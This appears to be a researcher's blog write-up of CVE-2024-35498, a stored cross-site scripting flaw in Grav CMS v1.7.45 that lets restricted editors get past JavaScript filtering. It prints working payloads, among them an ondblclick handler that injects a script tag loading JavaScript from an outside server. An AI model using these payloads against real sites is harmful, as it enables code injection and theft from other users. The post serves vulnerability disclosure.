Open in app

Sign in

Write

Sign in

A Quick Dive into XSS Vulnerability in Grav CMS v1.7.45 CVE-2024–35498

R4vanan
3 min readJul 27, 2024

--

This vulnerability allows users with restricted page creation and editing privileges to insert harmful JavaScript code into the pages they create. Although the admin has restricted these users from inserting JavaScript directly, they can exploit the ondblclick event in HTML tags to bypass these restrictions, potentially escalating admin restrictions. I don't want to get you all bored.

Checking privileges for the testing user

  1. User Privileges Check: Users with restricted access can only edit and insert HTML tags but cannot run JavaScript directly. The below image will show you the privileges which is given to this user.

The user cannot insert JavaScript into the pages they create or edit. However, they can use certain dangerous HTML tags too. so, sad.

POC (OR) EXPLOITATION:

  1. Login into the account.

While creating the user in the admin panel, I discovered that the <a> tag is not restricted. The <a> tag, also known as the anchor tag, is primarily used to define hyperlinks, facilitating navigation from one page to another through clickable links. Despite its typical use, the absence of restrictions on this tag in this context poses a significant security risk. I tried many ways. like, inserting the payload like

<a href=”javascript:alert(1)”>

I mostly use this payload for getting xss popup in bughuntings. so, i tried that payload. unfortunately i cant get the payload executing. javascript code fully removed while saving. so i tried every events to execute javascript code. No Luck!

Crafting the Malicious Page:

then i notice that <a ondblclick='alert(1)'><h1>test</h1></a> executing the javascript code on that webpage.

Inserted the code successfully.

When I visited the webpage, I saw the XSS vulnerability in action with the basic payload — just an alert saying “1”. But hold on, an attacker wouldn’t stop there with something so simple, right? They’d want to load something much more dangerous.

So, I decided to test it further and used this payload to load a JavaScript file from the attacker’s server:

<a ondblclick='var s=document.createElement("script");s.src="http://192.168.86.129:9000/test.js";s.onerror=()=>console.error("Error loading script!");document.head.appendChild(s);'><h1>test</h1></a>

This little snippet tricks the page into pulling in a JavaScript file from an external source. Double-clicking the link doesn’t just show an alert anymore — it loads and executes the attacker’s script. Looks like this XSS vulnerability could do a lot more than just pop up a simple message!

I added the payload, saved the changes, and then checked out the webpage. To my surprise, the log showed it fetching a JavaScript file from the attacker’s server. Looks like the script was live and kicking!

BOOM!! XSS is also popedup.

Version of grav and my work station:

* PHP 8.2.12 (cli) (built: Jan 8 2024 06:21:20) (NTS)
* Grav v1.7.45
* kalilinux
Xss Attack
Grav
Bypass
Xss Bypass
Cve

--

--

R4vanan
R4vanan

Written by R4vanan

8 Followers
24 Following

Security Researcher | TUI, linux, opensource lover | Bughunter | CEH

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams